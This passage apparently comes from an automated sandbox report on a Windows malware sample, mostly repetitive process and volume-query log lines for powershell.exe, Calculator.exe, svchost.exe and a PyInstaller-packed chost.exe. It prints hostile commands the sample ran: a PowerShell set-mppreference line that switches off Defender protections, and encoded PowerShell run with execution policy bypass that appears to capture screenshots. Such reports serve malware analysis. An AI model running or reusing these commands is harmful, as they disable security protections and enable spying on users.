oaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\chost.exe

Code function: 16_2_00007FF6943895E0 cpuid

16_2_00007FF6943895E0

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\ucrtbase.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
